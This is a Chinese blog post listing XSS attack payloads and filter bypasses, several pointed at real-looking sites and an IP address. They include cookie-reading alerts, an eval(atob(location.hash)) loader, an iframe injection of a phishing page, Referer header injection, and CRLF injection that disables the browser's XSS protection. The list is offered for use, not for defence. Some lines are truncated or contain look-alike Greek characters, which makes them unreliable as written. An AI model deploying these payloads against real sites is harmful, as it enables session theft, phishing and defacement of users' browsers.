XSS跨站攻击代码大全

'“>ipt> 过滤script绕过
<img src=""οnerrοr=“alert(‘xss’)”> 直接k掉script绕过

包含alert就绕过(括号一串数字是alert(xss)的ASCII值)

通过构造一个带xss的锚点绕过

过chrome默认xss过滤器

http://54.222.168.105:8065/?error=email%E9%94%99%E8%AF%AF%3C/script%3E%3Cscript%3E1%3C(br=1)*/%0deval(atob(location.hash.substr(1)))%3C/script%3E#xxxxxx

%22Onclick%3D(outerHTML%3DURL)|%26quot#<img/src=# οnerrοr=alert()>
%27%29%0D%0Aalert%28document.cookie%29%2F%2F

(最常用)

<img scr=javascript:alert(“跨站”)>

http://www.example.com/MyApp.aspx?myvar= "></XSS/-/STYLE=xss:e/**/xpression(alert(‘XSS’))>

" οnclick="alert(1)"

“]}%3Cscript%3Ealert(‘By b14ckb0y’)%3C/script%3E{[&item=”]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600>["

/peixun/Search.asp?Field=&Keyword=&ClassID=0&page=2
/peixun/Search.asp?Field='/>&Keyword=&ClassID=0&page=2

Referer: '"> 传送头插入

/peixun/Search.asp?Field=%27%22%3E%3Ciframe+id%3D445+src%3Dhttp%3A%2F%2Fdemo.testfire.net%2Fphishing.html%3E

/peixun/Search.asp?Field='">

/user/User_Message.asp?Action=Manage&ManageType=Inbox&Field=Content%22%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%35%38%34%38%33%29%3c%2f%73%43%72%49%70%54%3e

< name=“Submit”>

http://www.xx.com/netsearch_pre.jsp?netname=1" οnmοuseenter="prompt(/csits/)

url=%0aX-XSS-Protection:%200%0a%0d%0a%0d<img%20src=1%20οnerrοr=alert(/xss/)>

http://edu.gf.com.cn/simulate?type=simulate_open&category=%3Cimg%20src=@%20οnmοuseοver=confirm(/xssme27/)%3E

  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

愿听风成曲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值